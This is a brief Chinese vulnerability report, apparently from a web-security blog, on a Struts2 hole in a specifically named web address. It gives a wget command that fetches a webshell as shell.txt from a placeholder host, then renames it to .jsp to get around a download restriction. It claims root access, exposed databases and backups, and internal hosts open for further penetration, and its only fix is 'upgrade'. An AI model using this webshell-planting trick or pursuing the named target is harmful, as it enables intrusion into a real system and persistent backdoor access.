struts2漏洞 地址:http://wxhd.shwxcs.cn/PhotoflyingCity/AppActivityNfc/index.action?urlcategory=1&appid=AP310000000000010634&areacode=310000&portaltype=0&columnid=&accesstype=1&ext=&version=3&usessionid=&ua=&resourceid=SV310000000333&backurl= 服务器有限制,wget无法直接下载shell,小技巧绕过 先下载txt格式然后vm命令改成jsp wget -P 绝对路径 http://www.xxx.com/shell.txt mv 绝对路径/shell.txt 绝对路径/shell.jsp root权限
可替换apk应用 涉及多个数据库
多个业务备份 多个内网机器,可继续渗透
解决方案:升级 |
-
上一篇: 总结Web应用中基于浏览器的安全漏洞 – 网站安全 – 自学php网
下一篇: Alibaba CTF 2015 – XSS400 WriteUP – 网站安全 – 自学php网
评论前必须登录!
立即登录